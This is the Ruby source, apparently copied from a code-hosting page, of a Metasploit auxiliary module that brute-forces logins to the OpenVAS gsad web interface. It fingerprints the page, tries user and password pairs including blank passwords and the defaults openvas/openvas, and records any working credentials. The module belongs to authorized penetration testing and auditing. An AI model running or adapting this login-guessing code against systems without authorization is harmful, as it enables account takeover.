Path: blob/master/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
19851 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::AuthBrute910include Msf::Auxiliary::Scanner1112def initialize13super(14'Name' => 'OpenVAS gsad Web Interface Login Utility',15'Description' => %q{16This module simply attempts to login to an OpenVAS gsad interface17using a specific user/pass.18},19'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],20'License' => MSF_LICENSE,21'DefaultOptions' => { 'SSL' => true }22)2324register_options(25[26Opt::RPORT(443),27OptString.new('URI', [true, "URI for OpenVAS omp login. Default is /omp", "/omp"]),28OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),29]30)3132register_advanced_options(33[34OptString.new('OMP_text', [true, "value for OpenVAS omp text login hidden field", "/omp?cmd=get_tasks&overrides=1"]),35OptString.new('OMP_cmd', [true, "value for OpenVAS omp cmd login hidden field", "login"])36]37)38end3940def run_host(ip)41begin42res = send_request_cgi({43'uri' => datastore['URI'],44'method' => 'GET'45}, 25)46http_fingerprint({ :response => res })47rescue ::Rex::ConnectionError => e48vprint_error("#{msg} #{datastore['URI']} - #{e}")49return50end5152if not res53vprint_error("#{msg} #{datastore['URI']} - No response")54return55end56if res.code != 20057vprint_error("#{msg} - Expected 200 HTTP code - not gsad?")58return59end60if res.body !~ /Greenbone Security Assistant \(GSA\)/61vprint_error("#{msg} - Expected GSA keyword on page - not gsad?")62return63end6465each_user_pass do |user, pass|66do_login(user, pass)67end68end6970def do_login(user = 'openvas', pass = 'openvas')71vprint_status("#{msg} - Trying username:'#{user}' with password:'#{pass}'")72headers = {}73begin74res = send_request_cgi({75'encode' => true,76'uri' => datastore['URI'],77'method' => 'POST',78'headers' => headers,79'vars_post' => {80'cmd' => datastore['OMP_cmd'],81'text' => datastore['OMP_text'],82'login' => user,83'password' => pass84}85}, 25)86rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT87print_error("#{msg} HTTP Connection Failed, Aborting")88return :abort89end9091if not res92print_error("#{msg} HTTP Connection Error - res, Aborting")93return :abort94end9596# vprint_status("#{msg} GOT BODY. '#{user}' : '#{pass}' - #{res.code} #{res.body}")9798if res.code == 30399print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")100101report_cred(102ip: datastore['RHOST'],103port: datastore['RPORT'],104service_name: 'openvas-gsa',105user: user,106password: pass,107proof: res.code.to_s108)109return :next_user110end111vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}'")112return :skip_pass113end114115def report_cred(opts)116service_data = {117address: opts[:ip],118port: opts[:port],119service_name: opts[:service_name],120protocol: 'tcp',121workspace_id: myworkspace_id122}123124credential_data = {125origin_type: :service,126module_fullname: fullname,127username: opts[:user],128private_data: opts[:password],129private_type: :password130}.merge(service_data)131132login_data = {133core: create_credential(credential_data),134status: Metasploit::Model::Login::Status::UNTRIED,135proof: opts[:proof]136}.merge(service_data)137138create_credential_login(login_data)139end140141def msg142"#{vhost}:#{rport} OpenVAS gsad -"143end144end145146147